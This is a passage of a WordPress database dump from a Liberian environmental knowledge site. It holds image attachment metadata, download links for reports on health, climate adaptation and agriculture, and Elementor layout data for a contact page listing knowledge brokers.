";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(34735,5064,'_wp_attached_file','2022/09/202205091307244dhl2019real.pdf'),(34736,5062,'_wp_page_template','default'),(34737,5062,'download_link','https://ekmsliberia.info/wp-content/uploads/2022/09/202205091307244dhl2019real.pdf'),(34738,5062,'by','Liberia Institute of Statistics and Geo-Information Services (LISGIS), MOH, DHS'),(34739,5062,'year','April 2021'),(34740,5062,'_pods_document_cover_image','a:1:{i:0;i:5063;}'),(34741,5062,'document_cover_image','5063'),(34742,5062,'_pods_attached_document','a:1:{i:0;i:5064;}'),(34743,5062,'attached_document','5064'),(34746,5067,'_last_editor_used_jetpack','classic-editor'),(34747,5067,'_edit_lock','1663332348:38'),(34748,5067,'_edit_last','38'),(34749,5068,'_wp_attached_file','2022/09/Climate-change.png'),(34750,5068,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:406;s:6:\"height\";i:575;s:4:\"file\";s:26:\"2022/09/Climate-change.png\";s:5:\"sizes\";a:8:{s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"Climate-change-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"Climate-change-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:26:\"Climate-change-370x265.png\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:25:\"Climate-change-150x85.png\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:26:\"Climate-change-230x230.png\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-m\";a:4:{s:4:\"file\";s:26:\"Climate-change-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"kava-thumb-m-vertical\";a:4:{s:4:\"file\";s:26:\"Climate-change-370x500.png\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-m-2\";a:4:{s:4:\"file\";s:26:\"Climate-change-406x450.png\";s:5:\"width\";i:406;s:6:\"height\";i:450;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(34751,5069,'_wp_attached_file','2022/09/Barrolle-William-2016-Climate-Change-Adaptation-for-Smallholder-Farm-Families.pdf'),(34752,5067,'_wp_page_template','default'),(34753,5067,'download_link','https://ekmsliberia.info/wp-content/uploads/2022/09/Barrolle-William-2016-Climate-Change-Adaptation-for-Smallholder-Farm-Families.pdf'),(34754,5067,'by','Barrolle-William'),(34755,5067,'year','2016'),(34756,5067,'_pods_document_cover_image','a:1:{i:0;i:5068;}'),(34757,5067,'document_cover_image','5068'),(34758,5067,'_pods_attached_document','a:1:{i:0;i:5069;}'),(34759,5067,'attached_document','5069'),(34760,5071,'_last_editor_used_jetpack','classic-editor'),(34761,5071,'_edit_lock','1663539031:38'),(34762,5071,'_edit_last','38'),(34763,5072,'_wp_attached_file','2022/09/NAP.png'),(34764,5072,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:412;s:6:\"height\";i:536;s:4:\"file\";s:15:\"2022/09/NAP.png\";s:5:\"sizes\";a:8:{s:6:\"medium\";a:4:{s:4:\"file\";s:15:\"NAP-231x300.png\";s:5:\"width\";i:231;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:15:\"NAP-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:15:\"NAP-370x265.png\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:14:\"NAP-150x85.png\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:15:\"NAP-230x230.png\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-m\";a:4:{s:4:\"file\";s:15:\"NAP-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"kava-thumb-m-vertical\";a:4:{s:4:\"file\";s:15:\"NAP-370x500.png\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-m-2\";a:4:{s:4:\"file\";s:15:\"NAP-412x450.png\";s:5:\"width\";i:412;s:6:\"height\";i:450;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(34765,5073,'_wp_attached_file','2022/09/LIBERIA_-NAP_-FINAL_-DOCUMENT.pdf'),(34766,5071,'_wp_page_template','default'),(34767,5071,'download_link','https://ekmsliberia.info/wp-content/uploads/2022/09/LIBERIA_-NAP_-FINAL_-DOCUMENT.pdf'),(34768,5071,'by','EPA'),(34769,5071,'year','2020 – 2030'),(34770,5071,'_pods_document_cover_image','a:1:{i:0;i:5072;}'),(34772,5071,'_pods_attached_document','a:1:{i:0;i:5073;}'),(34774,5071,'document_cover_image','5072'),(34775,5071,'attached_document','5073'),(34776,5075,'_wp_attached_file','2022/08/1413a56e-7f8a-4211-a032-aaa15b304e01.jpg'),(34777,5075,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:530;s:4:\"file\";s:48:\"2022/08/1413a56e-7f8a-4211-a032-aaa15b304e01.jpg\";s:5:\"sizes\";a:11:{s:6:\"medium\";a:4:{s:4:\"file\";s:48:\"1413a56e-7f8a-4211-a032-aaa15b304e01-300x155.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:155;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:48:\"1413a56e-7f8a-4211-a032-aaa15b304e01-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:48:\"1413a56e-7f8a-4211-a032-aaa15b304e01-768x398.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:398;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:48:\"1413a56e-7f8a-4211-a032-aaa15b304e01-370x265.jpg\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:47:\"1413a56e-7f8a-4211-a032-aaa15b304e01-150x85.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:48:\"1413a56e-7f8a-4211-a032-aaa15b304e01-230x230.jpg\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"kava-thumb-m\";a:4:{s:4:\"file\";s:48:\"1413a56e-7f8a-4211-a032-aaa15b304e01-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"kava-thumb-m-vertical\";a:4:{s:4:\"file\";s:48:\"1413a56e-7f8a-4211-a032-aaa15b304e01-370x500.jpg\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"kava-thumb-m-2\";a:4:{s:4:\"file\";s:48:\"1413a56e-7f8a-4211-a032-aaa15b304e01-570x450.jpg\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"kava-thumb-masonry\";a:4:{s:4:\"file\";s:48:\"1413a56e-7f8a-4211-a032-aaa15b304e01-600x311.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:311;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"kava-thumb-justify\";a:4:{s:4:\"file\";s:48:\"1413a56e-7f8a-4211-a032-aaa15b304e01-640x530.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:530;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(34778,4960,'university_logo','4961'),(34779,5076,'_last_editor_used_jetpack','classic-editor'),(34780,5076,'_edit_lock','1663539472:38'),(34781,5076,'_edit_last','38'),(34782,5077,'_wp_attached_file','2022/09/MOA.png'),(34783,5077,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:387;s:6:\"height\";i:554;s:4:\"file\";s:15:\"2022/09/MOA.png\";s:5:\"sizes\";a:8:{s:6:\"medium\";a:4:{s:4:\"file\";s:15:\"MOA-210x300.png\";s:5:\"width\";i:210;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:15:\"MOA-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:15:\"MOA-370x265.png\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:14:\"MOA-150x85.png\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:15:\"MOA-230x230.png\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-m\";a:4:{s:4:\"file\";s:15:\"MOA-387x400.png\";s:5:\"width\";i:387;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"kava-thumb-m-vertical\";a:4:{s:4:\"file\";s:15:\"MOA-370x500.png\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-m-2\";a:4:{s:4:\"file\";s:15:\"MOA-387x450.png\";s:5:\"width\";i:387;s:6:\"height\";i:450;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(34784,5078,'_wp_attached_file','2022/09/CFSNS-FINAL.pdf'),(34785,5076,'_wp_page_template','default'),(34786,5076,'download_link','https://ekmsliberia.info/wp-content/uploads/2022/09/CFSNS-FINAL.pdf'),(34787,5076,'by','MOA'),(34788,5076,'year','2013'),(34789,5076,'_pods_document_cover_image','a:1:{i:0;i:5077;}'),(34790,5076,'document_cover_image','5077'),(34791,5076,'_pods_attached_document','a:1:{i:0;i:5078;}'),(34792,5076,'attached_document','5078'),(34793,5080,'_last_editor_used_jetpack','classic-editor'),(34794,5080,'_edit_lock','1663576408:38'),(34795,5080,'_edit_last','38'),(34796,5081,'_wp_attached_file','2022/09/MOA1.png'),(34797,5081,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:406;s:6:\"height\";i:572;s:4:\"file\";s:16:\"2022/09/MOA1.png\";s:5:\"sizes\";a:8:{s:6:\"medium\";a:4:{s:4:\"file\";s:16:\"MOA1-213x300.png\";s:5:\"width\";i:213;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:16:\"MOA1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:16:\"MOA1-370x265.png\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:15:\"MOA1-150x85.png\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:16:\"MOA1-230x230.png\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-m\";a:4:{s:4:\"file\";s:16:\"MOA1-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"kava-thumb-m-vertical\";a:4:{s:4:\"file\";s:16:\"MOA1-370x500.png\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-m-2\";a:4:{s:4:\"file\";s:16:\"MOA1-406x450.png\";s:5:\"width\";i:406;s:6:\"height\";i:450;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(34798,5082,'_wp_attached_file','2022/09/LASIPJune1st.pdf'),(34799,5080,'_wp_page_template','default'),(34800,5080,'download_link','https://ekmsliberia.info/wp-content/uploads/2022/09/LASIPJune1st.pdf'),(34801,5080,'by','MOA'),(34802,5080,'year','2010'),(34803,5080,'_pods_document_cover_image','a:1:{i:0;i:5081;}'),(34805,5080,'_pods_attached_document','a:1:{i:0;i:5082;}'),(34809,5080,'document_cover_image','5081'),(34810,5080,'attached_document','5082'),(34822,5086,'_wp_attached_file','2022/09/Halala.jpg'),(34823,5086,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:700;s:6:\"height\";i:652;s:4:\"file\";s:18:\"2022/09/Halala.jpg\";s:5:\"sizes\";a:12:{s:6:\"medium\";a:4:{s:4:\"file\";s:18:\"Halala-300x279.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:279;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:18:\"Halala-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:18:\"Halala-370x265.jpg\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:17:\"Halala-150x85.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:18:\"Halala-230x230.jpg\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"kava-thumb-m\";a:4:{s:4:\"file\";s:18:\"Halala-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"kava-thumb-m-vertical\";a:4:{s:4:\"file\";s:18:\"Halala-370x500.jpg\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"kava-thumb-m-2\";a:4:{s:4:\"file\";s:18:\"Halala-570x450.jpg\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"kava-thumb-l\";a:4:{s:4:\"file\";s:18:\"Halala-700x650.jpg\";s:5:\"width\";i:700;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"kava-thumb-masonry\";a:4:{s:4:\"file\";s:18:\"Halala-600x559.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:559;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"kava-thumb-justify\";a:4:{s:4:\"file\";s:18:\"Halala-640x640.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"kava-thumb-justify-2\";a:4:{s:4:\"file\";s:18:\"Halala-700x640.jpg\";s:5:\"width\";i:700;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(34824,5087,'_wp_attached_file','2022/09/ernest.jpg'),(34825,5087,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:700;s:6:\"height\";i:652;s:4:\"file\";s:18:\"2022/09/ernest.jpg\";s:5:\"sizes\";a:12:{s:6:\"medium\";a:4:{s:4:\"file\";s:18:\"ernest-300x279.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:279;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:18:\"ernest-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:18:\"ernest-370x265.jpg\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:17:\"ernest-150x85.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:18:\"ernest-230x230.jpg\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"kava-thumb-m\";a:4:{s:4:\"file\";s:18:\"ernest-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"kava-thumb-m-vertical\";a:4:{s:4:\"file\";s:18:\"ernest-370x500.jpg\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"kava-thumb-m-2\";a:4:{s:4:\"file\";s:18:\"ernest-570x450.jpg\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"kava-thumb-l\";a:4:{s:4:\"file\";s:18:\"ernest-700x650.jpg\";s:5:\"width\";i:700;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"kava-thumb-masonry\";a:4:{s:4:\"file\";s:18:\"ernest-600x559.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:559;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"kava-thumb-justify\";a:4:{s:4:\"file\";s:18:\"ernest-640x640.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"kava-thumb-justify-2\";a:4:{s:4:\"file\";s:18:\"ernest-700x640.jpg\";s:5:\"width\";i:700;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(34826,5088,'_elementor_edit_mode','builder'),(34827,5088,'_elementor_template_type','wp-page'),(34828,5088,'_elementor_version','3.0.16'),(34829,5088,'_wp_page_template','default'),(34830,5088,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\"}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\"}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\"}]},\"elements\":[{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":-23},\"elements\":[{\"id\":\"92e0be0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\"}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":51,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/jallah.png\",\"id\":3371},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7695f0f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c329034\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93bee82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J.S. Datuama Cammue<\\/strong><br \\/>MEAs Officer<br \\/>UNCBD Focal Point<br \\/>EPA<br \\/><a 